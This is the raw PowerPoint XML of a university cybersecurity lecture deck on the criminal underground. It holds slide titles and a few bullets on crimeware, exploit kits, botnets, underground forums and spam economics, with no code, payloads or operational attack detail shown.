              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Categories and quantities of merchandise on the Carders forum (2008-2010)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10030712" y="2121395"/>
            <a:ext cx="1872251" cy="1270570"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -82257"/>
              <a:gd name="adj2" fmla="val -211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Prepaid cash cards, used to launder money</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4504562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Underground Forums Wrap-up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4750104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today, underground forums are ubiquitous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many operate in plain site; they’re just a Google search away</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large volume of illicit goods and services are available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Law enforcement often targets forums/IRC rooms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some cases, forums have been law enforcement sting operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, new venues always rise to fill the void</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Black market forums are hugely valuable for security professionals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Give researchers a view into the underworld</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow white-hats to observe trends and detect unfolding attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6780255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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Spam and “Affiliates”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Advertising by another name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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7576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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA288E99-8C2D-4A88-999A-23A6D9C7AD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7414562" y="632347"/>
            <a:ext cx="3021534" cy="10176"/>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163747" y="162006"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="739750" y="855947"/>
          <a:ext cx="10515600" cy="6101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Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3251745" y="4966385"/>
            <a:ext cx="0" cy="145411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85766" y="6180655"/>
            <a:ext cx="0" cy="2398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10438616" y="6171647"/>
            <a:ext cx="0" cy="3315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3251745" y="6421980"/>
            <a:ext cx="83255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504609" y="6162431"/>
            <a:ext cx="0" cy="2864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4504609" y="6448927"/>
            <a:ext cx="7106809" cy="677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a:xfrm>
            <a:off x="11611418" y="2126665"/>
            <a:ext cx="0" cy="43900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flipH="1">
            <a:off x="9973735" y="2126665"/>
            <a:ext cx="163768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B3DBC1-5D68-4327-9F7E-9CC4669056DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296714" y="6174230"/>
            <a:ext cx="0" cy="49253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FDAFA2-28DA-49EC-B885-3B2BE77B64AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505400" y="6668974"/>
            <a:ext cx="27913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DD76233-8748-48BA-A5C0-85B198F15820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1505400" y="4966385"/>
            <a:ext cx="0" cy="17085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4787FDB-0F75-4C11-ADD9-9A98A3C531E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3541057"/>
            <a:ext cx="0" cy="4927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3D054B5-2392-4175-9CD5-CDE7FF4C0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3548530"/>
            <a:ext cx="5996989" cy="465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48BDDD5-F446-438D-9B52-AB2568ADA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621701" y="3595111"/>
            <a:ext cx="0" cy="4386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D0F61A8-1D5D-447A-BBA7-869295DDE43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161466" y="3595110"/>
            <a:ext cx="0" cy="4386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D536A7E7-A6E2-4715-8939-342DAD5AB441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6556798" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle: Rounded Corners 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6739DC6-B36D-489A-BCFA-643DCAEE5EAB}"/>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3908339E-1583-46AF-A390-A94A28E28DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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rPr>
                <a:t>Zero-day Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5FD889-3346-4CD8-A038-C5C40C956210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9550956" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle: Rounded Corners 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CBF0C-03A9-4452-A839-415F0248E337}"/>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B269B01C-5C1F-4067-AA5F-8E88FF7F55BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crimeware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA76E5D-33F4-4A5A-B745-17A391F4D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481636" y="1068185"/>
            <a:ext cx="0" cy="22949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1" name="Straight Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31171E-46D8-4B36-8CDE-5EB642F4D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10503171" y="1068185"/>
            <a:ext cx="0" cy="22949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2" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B801004-FC82-43D0-BBB2-B7EA49575171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925329" y="1297681"/>
            <a:ext cx="0" cy="304636"/>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63" name="Straight Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94C6349-1204-483B-BE52-BD95F8D8707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7481637" y="1297681"/>
            <a:ext cx="3021534" cy="10176"/>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72" name="Rectangle 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91FA6C24-2F6D-4B68-B100-3C33A9D28792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702080" y="3730933"/>
            <a:ext cx="1559110" cy="1305804"/>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76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40894DD1-ECDF-483A-B62D-198E51C83BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3699587" y="1923564"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050411" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle: Rounded Corners 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E119D37-D620-41AC-B0E7-EB5491840D73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6214327" y="1292169"/>
              <a:ext cx="1875635" cy="78638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53F0EF3E-E5D5-47A7-B8F0-4AAB69871267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389102" y="1411965"/>
              <a:ext cx="1875636" cy="786384"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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rPr>
                <a:t>Bulletproof Hosting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170130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TotalTime>
  <Words>8383</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1390</Paragraphs>
  <Slides>146</Slides>
  <Notes>12</Notes>
  <HiddenSlides>41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146</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="153" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CY 2550 Foundations of Cybersecurity</vt:lpstr>
      <vt:lpstr>Attack Mechanisms vs. Attackers</vt:lpstr>
      <vt:lpstr>Structure of the Underground</vt:lpstr>
      <vt:lpstr>Actors in the Underground</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Crimeware</vt:lpstr>
      <vt:lpstr>Structure of the Underground</vt:lpstr>
      <vt:lpstr>Crimeware Functionality</vt:lpstr>
      <vt:lpstr>Trojans</vt:lpstr>
      <vt:lpstr>Backdoors</vt:lpstr>
      <vt:lpstr>Rootkits</vt:lpstr>
      <vt:lpstr>Types of Rootkits</vt:lpstr>
      <vt:lpstr>Viruses and Worms</vt:lpstr>
      <vt:lpstr>Worm Considerations</vt:lpstr>
      <vt:lpstr>Famous Worms</vt:lpstr>
      <vt:lpstr>Research Worms</vt:lpstr>
      <vt:lpstr>Spyware</vt:lpstr>
      <vt:lpstr>$$$</vt:lpstr>
      <vt:lpstr>$$$, continued</vt:lpstr>
      <vt:lpstr>Crimeware Distribution</vt:lpstr>
      <vt:lpstr>Common Methods of Compromise</vt:lpstr>
      <vt:lpstr>Malware Attachments</vt:lpstr>
      <vt:lpstr>Application Exploit Examples</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Mirai</vt:lpstr>
      <vt:lpstr>Partial Mirai Credential List</vt:lpstr>
      <vt:lpstr>Drive-by Exploits</vt:lpstr>
      <vt:lpstr>Modern Browser Architecture</vt:lpstr>
      <vt:lpstr>Example IE Exploit</vt:lpstr>
      <vt:lpstr>Executing a Drive-by </vt:lpstr>
      <vt:lpstr>Exploits-as-a-Service</vt:lpstr>
      <vt:lpstr>Structure of the Underground</vt:lpstr>
      <vt:lpstr>Decoupling and Specialization</vt:lpstr>
      <vt:lpstr>Exploit-as-a-Service and Pay-per-Install</vt:lpstr>
      <vt:lpstr>Exploit Kits and Traffic-PPI Services</vt:lpstr>
      <vt:lpstr>Traffic-PPI Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploits Used by Blackhole</vt:lpstr>
      <vt:lpstr>Exploits Used by Blackhole</vt:lpstr>
      <vt:lpstr>“Manufacturing Compromise: The Emergence of Exploit-as-a-Service”</vt:lpstr>
      <vt:lpstr>Measurement Methodology</vt:lpstr>
      <vt:lpstr>The Funnel</vt:lpstr>
      <vt:lpstr>Malware and Monetization</vt:lpstr>
      <vt:lpstr>Exploit-as-a-Service Wrapup</vt:lpstr>
      <vt:lpstr>Have Fun in Siberia</vt:lpstr>
      <vt:lpstr>Botnets</vt:lpstr>
      <vt:lpstr>Structure of the Underground</vt:lpstr>
      <vt:lpstr>From Crimeware to Botnets</vt:lpstr>
      <vt:lpstr>Old-School C&amp;C: IRC Channels</vt:lpstr>
      <vt:lpstr>P2P Botnets</vt:lpstr>
      <vt:lpstr>Fast Flux DNS</vt:lpstr>
      <vt:lpstr>Domain Name Generation (DGA)</vt:lpstr>
      <vt:lpstr>“Your Botnet is My Botnet”</vt:lpstr>
      <vt:lpstr>Torpig Architecture</vt:lpstr>
      <vt:lpstr>Monster-in-the-Browser Attack</vt:lpstr>
      <vt:lpstr>Torpig Rendezvous Algorithm</vt:lpstr>
      <vt:lpstr>Domain Generation Algorithm</vt:lpstr>
      <vt:lpstr>Stolen Information</vt:lpstr>
      <vt:lpstr>Spam Campaigns</vt:lpstr>
      <vt:lpstr>How to Estimate Botnet Size?</vt:lpstr>
      <vt:lpstr>Size of the Torpig Botnet</vt:lpstr>
      <vt:lpstr>“A Botmaster’s Perspective of Coordinating Large-Scale Spam Campaigns”</vt:lpstr>
      <vt:lpstr>Size</vt:lpstr>
      <vt:lpstr>Denylisting</vt:lpstr>
      <vt:lpstr>Time to Blacklist</vt:lpstr>
      <vt:lpstr>Stopping Botnets</vt:lpstr>
      <vt:lpstr>Stopping Botnets</vt:lpstr>
      <vt:lpstr>Classic Detection of Bots</vt:lpstr>
      <vt:lpstr>Detection of DGA and Fast Flux</vt:lpstr>
      <vt:lpstr>Detection of P2P</vt:lpstr>
      <vt:lpstr>Infamous Takedowns</vt:lpstr>
      <vt:lpstr>Conficker</vt:lpstr>
      <vt:lpstr>Propagation and Self-Defense</vt:lpstr>
      <vt:lpstr>Size</vt:lpstr>
      <vt:lpstr>Command and Control</vt:lpstr>
      <vt:lpstr>Conficker Working Group (CFW)</vt:lpstr>
      <vt:lpstr>Taking Down Conficker</vt:lpstr>
      <vt:lpstr>An Enormous Sinkhole</vt:lpstr>
      <vt:lpstr>Kelihos</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Underground Forums</vt:lpstr>
      <vt:lpstr>eBay for the Underground</vt:lpstr>
      <vt:lpstr>“An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants”</vt:lpstr>
      <vt:lpstr>Advertisements</vt:lpstr>
      <vt:lpstr>Sensitive Data in Ads</vt:lpstr>
      <vt:lpstr>Are Credit Cards Valid?</vt:lpstr>
      <vt:lpstr>Where do Credit Cards Come From?</vt:lpstr>
      <vt:lpstr>Goods</vt:lpstr>
      <vt:lpstr>Services</vt:lpstr>
      <vt:lpstr>Prices for Hacked Hosts</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Treachery</vt:lpstr>
      <vt:lpstr>“An Analysis of Underground Forums”</vt:lpstr>
      <vt:lpstr>Underground Forums Wrap-up</vt:lpstr>
      <vt:lpstr>Spam and “Affiliates”</vt:lpstr>
      <vt:lpstr>Structure of the Underground</vt:lpstr>
      <vt:lpstr>On the Origins of Spam</vt:lpstr>
      <vt:lpstr>Affiliate Marketing</vt:lpstr>
      <vt:lpstr>“Spamalytics: An Empirical Analysis of Spam Marketing Conversion”</vt:lpstr>
      <vt:lpstr>Spam Conversion</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Storm Botnet</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Focus on Three Spam Campaigns</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Results: Campaign Volumes</vt:lpstr>
      <vt:lpstr>Rewritten Spam Emails per Hour</vt:lpstr>
      <vt:lpstr>Spam Delivery: Top Domains</vt:lpstr>
      <vt:lpstr>Spam Filter Effectiveness</vt:lpstr>
      <vt:lpstr>Conversion Tracking</vt:lpstr>
      <vt:lpstr>Geographic View of Conversions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Pharmaceutical Revenue</vt:lpstr>
      <vt:lpstr>“Spamcraft: An Inside Look At Spam Campaign Orchestration”</vt:lpstr>
      <vt:lpstr>Duration and Size</vt:lpstr>
      <vt:lpstr>Counterfeit Goods</vt:lpstr>
      <vt:lpstr>Structure of the Underground</vt:lpstr>
      <vt:lpstr>Affiliate Scams, Revisited</vt:lpstr>
      <vt:lpstr>Scammers in the Spotlight</vt:lpstr>
      <vt:lpstr>Scammin’ Ain’t Easy</vt:lpstr>
      <vt:lpstr>Scammin’ Ain’t Easy, Continued</vt:lpstr>
      <vt:lpstr>Example: Pharmacy Express</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Merchant Banks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Suppliers</vt:lpstr>
      <vt:lpstr>Pharmaleaks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Profit</vt:lpstr>
      <vt:lpstr>Fake Antivirus Software</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Fake AV by the Numbers</vt:lpstr>
      <vt:lpstr>Refunds and Chargebacks</vt:lpstr>
      <vt:lpstr>Intervention</vt:lpstr>
      <vt:lpstr>Final Words</vt:lpstr>
      <vt:lpstr>Scratching the Surface of the Underground</vt:lpstr>
      <vt:lpstr>Don’t Believe the Hype</vt:lpstr>
      <vt:lpstr>Criminals vs. State-Sponsored Attackers</vt:lpstr>
      <vt:lpstr>Sources</vt:lpstr>
      <vt:lpstr>More Sources</vt:lpstr>
      <vt:lpstr>More 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 2550 Foundations of Cybersecurity</dc:title>
  <dc:creator>Wilson, Christo</dc:creator>
  <cp:lastModifiedBy>Wilson, Christo</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-22T22:41:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-23T05:06:25Z</dcterms:modified>
</cp:coreProperties>
</file>